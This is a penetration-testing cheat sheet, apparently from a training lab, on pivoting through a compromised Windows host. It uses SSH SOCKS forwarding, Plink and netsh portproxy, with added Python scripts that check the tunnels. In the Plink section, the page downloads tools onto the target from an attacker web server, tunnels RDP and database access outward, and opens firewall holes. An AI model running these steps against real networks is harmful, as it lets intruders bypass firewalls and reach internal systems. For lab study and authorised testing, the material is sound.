Port Forwarding with Windows Tools
Last updated
# Useful when only a limited set of ports is allowed out of the Windows host (e.g. by AV or a host firewall).
# Remote dynamic port forwarding gives you a SOCKS proxy on the attacker side, so one allowed outbound SSH connection lets you reach many ports and hosts behind the pivot.
# Drawback: remote dynamic forwarding (-R with a bare port and no destination) needs an OpenSSH client version >= 7.6 on the Windows machine.
# Step 1:
# Verify if OpenSSH client is available on the Windows machine.
# Run in windows cmd
where ssh
# Example Output:
# C:\Windows\System32\OpenSSH\ssh.exe
# Step 2:
# Run in windows cmd
# Check the OpenSSH version to ensure it's >= 7.6.
ssh -V
# Example Output:
# OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2
# Step 3:
# Set up remote dynamic port forwarding: the Windows ssh client connects out to your SSH server and opens a SOCKS proxy there.
# -N: Prevents the SSH session from executing remote commands (no shell).
# -R [port]: With only a port and no destination, ssh binds that port on the SSH server as a SOCKS proxy and relays every connection made to it out through the Windows machine.
ssh -N -R [port] user@hostname
# Example:
# ssh -N -R 9998 <username>@<KALI_IP>
# Step 4:
# Verify on the SSH server (Kali) that the SOCKS listener is up.
sudo ss -ntplu
# Check for port listening on the specified port.
# Example:
# tcp LISTEN 0 128 127.0.0.1:9998 0.0.0.0:*
# Step 5:
# Configure proxychains to use the SOCKS proxy.
# Edit /etc/proxychains4.conf to include the SOCKS proxy.
# Check the configuration:
tail /etc/proxychains4.conf
# Example:
# socks5 127.0.0.1 9998
# Step 6:
# Run the desired command through proxychains.
proxychains psql -h <target_db_ip> -U postgres
# Example:
# proxychains psql -h 10.4.50.215 -U postgres
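The ss check in Step 4 only proves that something is listening on 127.0.0.1:9998; it does not prove that the listener speaks SOCKS5, nor that the Windows side can actually reach the database host. The probe below, an added example that is not part of the original page, does both: it performs the SOCKS5 no-auth greeting and then a CONNECT to the target, returning the SOCKS5 reply code. A listener that is not SOCKS (for instance an ssh -R that was given a full host:port and so became a plain TCP forward) makes it raise ConnectionError, and a non-zero reply tells you the pivot could not reach the destination. The target host is the page's 10.4.50.215; port 5432 (the PostgreSQL default) and the fake SOCKS5 server used by demo() are assumptions constructed for this example.

```python
import socket
import struct
import threading

# Constructed demo target: the PostgreSQL host from the page's psql example.
# 5432 is the PostgreSQL default port and is an assumption, not from the page.
TARGET_HOST = "10.4.50.215"
TARGET_PORT = 5432

SOCKS5_REPLY_NAMES = {
    0x00: "succeeded",
    0x01: "general failure",
    0x02: "not allowed by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "connection refused",
    0x06: "TTL expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}


def _recv_exact(sock, n):
    """Read exactly n bytes or raise; partial reads would desync the handshake."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-handshake")
        buf += chunk
    return buf


def socks5_connect(proxy_host, proxy_port, dest_host, dest_port, timeout=5.0):
    """SOCKS5 no-auth greeting plus a CONNECT to dest_host:dest_port via the proxy.

    Returns the SOCKS5 reply code (0x00 = the pivot reached the destination).
    Raises ConnectionError if the listener is not a SOCKS5 server at all.
    """
    s = socket.create_connection((proxy_host, proxy_port), timeout=timeout)
    try:
        # Greeting: version 5, one method offered, 0x00 = no authentication.
        s.sendall(b"\x05\x01\x00")
        ver, method = _recv_exact(s, 2)
        if ver != 0x05 or method != 0x00:
            raise ConnectionError(f"not a SOCKS5 no-auth listener (got {ver:#x} {method:#x})")
        # CONNECT: ver 5, cmd 1, rsv 0, atyp 3 (domain name) so the proxy side,
        # i.e. the Windows host, resolves the name with its own view of the network.
        host = dest_host.encode()
        s.sendall(b"\x05\x01\x00\x03" + bytes([len(host)]) + host + struct.pack("!H", dest_port))
        ver, rep, _rsv, atyp = _recv_exact(s, 4)
        if ver != 0x05:
            raise ConnectionError("malformed SOCKS5 reply")
        # Drain BND.ADDR/BND.PORT so the socket is closed cleanly.
        if atyp == 0x01:
            _recv_exact(s, 4 + 2)
        elif atyp == 0x03:
            (n,) = _recv_exact(s, 1)
            _recv_exact(s, n + 2)
        elif atyp == 0x04:
            _recv_exact(s, 16 + 2)
        return rep
    finally:
        s.close()


def _fake_socks5_server(allowed):
    """Constructed stand-in for the ssh -R listener: answers 0x00 for destinations
    in `allowed` and 0x05 (connection refused) for everything else."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            _recv_exact(conn, 3)                       # greeting
            conn.sendall(b"\x05\x00")                  # pick no-auth
            _ver, _cmd, _rsv, _atyp = _recv_exact(conn, 4)
            (n,) = _recv_exact(conn, 1)                # atyp 3: length-prefixed name
            host = _recv_exact(conn, n).decode()
            (port,) = struct.unpack("!H", _recv_exact(conn, 2))
            rep = 0x00 if (host, port) in allowed else 0x05
            conn.sendall(bytes([0x05, rep, 0x00, 0x01]) + b"\x00\x00\x00\x00\x00\x00")
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Probe a reachable and an unreachable destination through the fake listener."""
    port = _fake_socks5_server({(TARGET_HOST, TARGET_PORT)})
    ok = socks5_connect("127.0.0.1", port, TARGET_HOST, TARGET_PORT)
    port = _fake_socks5_server({(TARGET_HOST, TARGET_PORT)})
    bad = socks5_connect("127.0.0.1", port, "10.4.50.1", 22)
    return SOCKS5_REPLY_NAMES[ok], SOCKS5_REPLY_NAMES[bad]


if __name__ == "__main__":
    print(demo())
```

Against the real forward on Kali, call socks5_connect("127.0.0.1", 9998, "10.4.50.215", 5432): 0x00 means proxychains will work, 0x05 or 0x04 means the Windows host itself cannot reach the database, and ConnectionError means the listener on 9998 is not the SOCKS proxy you think it is.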
# Useful when OpenSSH is not available on Windows, but you need to set up port forwarding.
# Plink is lightweight and command-line based, suitable for situations where GUI access is limited.
# Step 1:
# From your shell on the target (reverse shell or web shell), download nc.exe and plink.exe from your Kali web server.
# wget is a PowerShell alias for Invoke-WebRequest, so this works from cmd.exe as well.
powershell wget -Uri http://<KALI_IP>/nc.exe -OutFile C:\Windows\Temp\nc.exe
powershell wget -Uri http://<KALI_IP>/plink.exe -OutFile C:\Windows\Temp\plink.exe
# Step 2:
# Create a remote port forward with Plink so a service blocked from outside (here RDP on the Windows host) becomes reachable from Kali.
# -ssh: Use the SSH protocol.
# -R [listen_addr:]listen_port:dest_host:dest_port: remote port forward. The listen side is on the SSH server (Kali); each connection to it is sent back through the tunnel and delivered by the Windows host to dest_host:dest_port.
# -l: SSH username on Kali.
# -pw: SSH password on Kali (it will show up in process listings and command history on the target).
# Note: 3389 is the RDP port; after this, Kali's 127.0.0.1:9833 is a path to RDP on the Windows host itself (127.0.0.1:3389 as seen from Windows).
# Example (cmd.exe does not expand $VARIABLES, so put the real values in):
C:\Windows\Temp\plink.exe -ssh -l <KALI_USERNAME> -pw <KALI_PASSWORD> -R 127.0.0.1:9833:127.0.0.1:3389 <KALI_IP>
# Note:
# If Plink prompts to cache the server's host key and your shell cannot answer interactively, pipe the confirmation in:
cmd.exe /c echo y | .\plink.exe -ssh -l <username> -pw <password> -R 127.0.0.1:9833:127.0.0.1:3389 <KALI_IP>
# Step 3:
# Verify on Kali that the forwarded port is listening.
ss -ntplu | grep 9833
# Step 4:
# Connect to the forwarded port with the appropriate client (e.g., xfreerdp for RDP).
xfreerdp /u:<username> /p:<password> /v:127.0.0.1:9833
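ss in Step 3 shows that Kali has a listener on 9833, but not whether the other end of the tunnel actually lands on an RDP service; if Plink's -R destination was mistyped you still get a listener, and xfreerdp just fails with a vague error. The probe below, an added example that is not part of the original page, sends a TPKT-wrapped X.224 Connection Request through the forwarded port and checks for the X.224 Connection Confirm (TPDU code 0xD0) that any RDP listener returns before security negotiation. The fake RDP and fake SSH services used by demo() are constructed for this example; the second one shows what a forward pointed at the wrong service looks like.

```python
import socket
import threading

# TPKT + X.224 Connection Request carrying an RDP_NEG_REQ that asks for
# standard RDP security (requestedProtocols = 0). An RDP listener answers
# with an X.224 Connection Confirm (TPDU code 0xD0) whatever it then insists on.
X224_CR = bytes.fromhex(
    "03000013"      # TPKT: version 3, reserved, total length 19
    "0ee000000000"  # X.224: LI 14, CR TPDU 0xE0, dst-ref 0, src-ref 0
    "00"            # class 0
    "01000800"      # RDP_NEG_REQ: type 1, flags 0, length 8 (little endian)
    "00000000"      # requestedProtocols 0 = standard RDP security
)
# Minimal Connection Confirm, constructed for the demo to stand in for a real server.
X224_CC = bytes.fromhex("0300000b06d00000123400")


def _recv_exact(sock, n):
    """Read exactly n bytes or raise, so a short read cannot be mistaken for a reply."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before a full reply arrived")
        buf += chunk
    return buf


def rdp_probe(host, port, timeout=5.0):
    """Send an X.224 Connection Request and return the TPDU code of the reply.

    0xD0 means an RDP service answered through the forward. Anything that is not
    even TPKT (first byte 0x03) means the forward exists but reaches some other service.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(X224_CR)
        hdr = _recv_exact(s, 6)  # TPKT header (4) + X.224 LI + TPDU code
    if hdr[0] != 0x03:
        raise ConnectionError(f"not TPKT (first byte {hdr[0]:#x})")
    return hdr[5]


def _fake_service(reply):
    """Constructed listener that swallows the client's request and sends a fixed reply."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.recv(64)
            conn.sendall(reply)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Probe a fake RDP service and a fake SSH service as if both sat behind the forward."""
    rdp_port = _fake_service(X224_CC)
    ssh_port = _fake_service(b"SSH-2.0-OpenSSH_8.1\r\n")
    got_rdp = rdp_probe("127.0.0.1", rdp_port) == 0xD0
    try:
        rdp_probe("127.0.0.1", ssh_port)
        wrong_service = None
    except ConnectionError as e:
        wrong_service = str(e)
    return got_rdp, wrong_service


if __name__ == "__main__":
    print(demo())
```

Against the real tunnel, rdp_probe("127.0.0.1", 9833) returning 0xD0 means xfreerdp is worth running; a ConnectionError or a different TPDU code means the Plink -R destination, not the RDP client, is what needs fixing.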
# Not working? Try another port.
# Useful when you need to forward traffic through a specific port on a Windows machine, especially if you only have access to a limited number of ports.
# This approach is useful in scenarios where firewall rules are restrictive but you can establish an RDP session with admin privileges.
# Step 1:
# RDP into the Windows machine (MULTISERVER03) and open a command prompt with administrative privileges.
# Step 2:
# Create a port forward using Netsh:
# - Listen on port 2222 on the interface facing Kali (192.168.170.64).
# - Forward packets to port 22 on PGDATABASE01 (10.4.170.215), which the Windows host can reach but Kali cannot.
# The portproxy service (IP Helper, iphlpsvc) must be running, and the rule persists across reboots until you delete it.
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.170.64 connectport=22 connectaddress=10.4.170.215
# Step 3:
# Verify the port is listening using netstat:
# IN RDP
netstat -anp TCP | find "2222"
# Step 4:
# Check existing portproxy rules:
netsh interface portproxy show all
# Step 5:
# Add a firewall rule to allow inbound traffic on port 2222:
# We are creating hole in firewall to access the port.
#IN RDP
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.170.64 localport=2222 action=allow
# If you want to check existing rule:
netsh advfirewall firewall show rule name=all | findstr "2222"
# To display all values:
netsh advfirewall firewall show rule name="port_forward_ssh_2222"
# Step 6:
# Verify the port is accessible from your machine (e.g., using Nmap):
# In Kali
sudo nmap -sS 192.168.170.64 -Pn -n -p2222
# Step 7:
# Test the connection through SSH:
# The login is a PGDATABASE01 account: the Windows host only relays the TCP connection.
ssh <username>@192.168.170.64 -p2222
# Step 8:
# After use, remember to clean up (both the firewall rule and the portproxy rule persist until deleted):
# Delete the firewall rule:
netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
# Delete the port forward:
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.170.64
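Because portproxy rules survive reboots, Step 4 (netsh interface portproxy show all) is worth running both before adding a rule, so you do not collide with one that is already there, and after Step 8, so you know the cleanup actually happened. The script below, an added example that is not part of the original page, parses that command's table output into rules, separates the ones you intended from leftovers, and prints the delete command for each leftover. The sample output is constructed for this example (the page's rule plus an invented stale one listening on every address); the column layout follows the netsh output format, and delete is the full form of the del verb the page uses.

```python
import re
from dataclasses import dataclass

# Constructed sample of `netsh interface portproxy show all` output: the rule the
# page adds plus a stale wildcard rule (assumed, not from the page) nobody removed.
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
192.168.170.64  2222        10.4.170.215    22
*               8080        10.4.170.215    80

Listen on ipv6:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
"""

FAMILY_NAMES = {"ipv4": "v4", "ipv6": "v6"}
SECTION = re.compile(r"^Listen on (ipv[46]):\s+Connect to (ipv[46]):")
ROW = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


@dataclass(frozen=True)
class PortProxyRule:
    family: str          # netsh's name for the pair, e.g. "v4tov4"
    listen_addr: str     # "*" means the rule listens on every address
    listen_port: int
    connect_addr: str
    connect_port: int

    def delete_command(self):
        """The netsh command that removes exactly this rule."""
        return (f"netsh interface portproxy delete {self.family} "
                f"listenport={self.listen_port} listenaddress={self.listen_addr}")


def parse_portproxy(text):
    """Turn `netsh interface portproxy show all` output into PortProxyRule objects.

    Section headers set the family; rows are four whitespace-separated columns.
    Header and dashed lines never match ROW because their port columns are not digits.
    """
    rules, family = [], None
    for line in text.splitlines():
        m = SECTION.match(line)
        if m:
            family = FAMILY_NAMES[m.group(1)] + "to" + FAMILY_NAMES[m.group(2)]
            continue
        m = ROW.match(line)
        if m and family:
            rules.append(PortProxyRule(family, m.group(1), int(m.group(2)),
                                       m.group(3), int(m.group(4))))
    return rules


def audit(rules, expected):
    """Split rules into the ones you meant to add and leftovers to delete.

    expected is an iterable of (listen_addr, listen_port, connect_addr, connect_port).
    """
    expected = set(expected)
    wanted = [r for r in rules
              if (r.listen_addr, r.listen_port, r.connect_addr, r.connect_port) in expected]
    leftovers = [r for r in rules if r not in wanted]
    return wanted, leftovers


if __name__ == "__main__":
    parsed = parse_portproxy(SAMPLE_OUTPUT)
    wanted, leftovers = audit(parsed, [("192.168.170.64", 2222, "10.4.170.215", 22)])
    for r in wanted:
        print("expected:", r)
    for r in leftovers:
        print("leftover:", r, "->", r.delete_command())
```

On the target, feed it the real output (netsh interface portproxy show all > rules.txt) instead of SAMPLE_OUTPUT; after Step 8 both lists should be empty, and anything still listed is a forward you or someone before you left behind.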